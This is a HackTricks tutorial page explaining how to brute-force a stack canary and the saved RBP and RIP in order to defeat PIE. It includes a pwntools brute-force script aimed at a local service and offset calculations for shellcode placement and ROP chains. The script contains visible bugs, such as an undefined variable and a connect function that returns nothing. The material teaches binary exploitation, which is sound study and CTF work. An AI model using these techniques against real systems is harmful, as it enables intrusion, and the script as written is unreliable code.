# BF Addresses in the Stack {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
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{% endhint %} **If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** ![](<../../../.gitbook/assets/image (865).png>) {% hint style="info" %} Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. {% endhint %} ## Brute-Force Addresses In order to **bypass the PIE** you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** {% hint style="success" %} It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case. {% endhint %} To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: ```python from pwn import * def connect(): r = remote("localhost", 8788) def get_bf(base): canary = "" guess = 0x0 base += canary while len(canary) < 8: while guess != 0xff: r = connect() r.recvuntil("Username: ") r.send(base + chr(guess)) if "SOME OUTPUT" in r.clean(): print "Guessed correct byte:", format(guess, '02x') canary += chr(guess) base += chr(guess) guess = 0x0 r.close() break else: guess += 1 r.close() print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) return base # CANARY BF HERE canary_offset = 1176 base = "A" * canary_offset print("Brute-Forcing canary") base_canary = get_bf(base) #Get yunk data + canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary # PIE BF FROM HERE print("Brute-Forcing RBP") base_canary_rbp = get_bf(base_canary) RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:]) print("Brute-Forcing RIP") base_canary_rbp_rip = get_bf(base_canary_rbp) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) ``` The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: ```python INI_SHELLCODE = RBP - 1152 ``` From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: ![](<../../../.gitbook/assets/image (479).png>) In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked `0x562002970ecf` the base address is `0x562002970000` ```python elf.address = RIP - (RIP & 0xfff) ``` ## Improvements According to [**some observation from this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), it's possible that when leaking RBP and RIP values, the server won't crash with some values which aren't the correct ones and the BF script will think he got the good ones. This is because it's possible that **some addresses just won't break it even if there aren't exactly the correct ones**. According to that blog post it's recommended to add a short delay between requests to the server is introduced. {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
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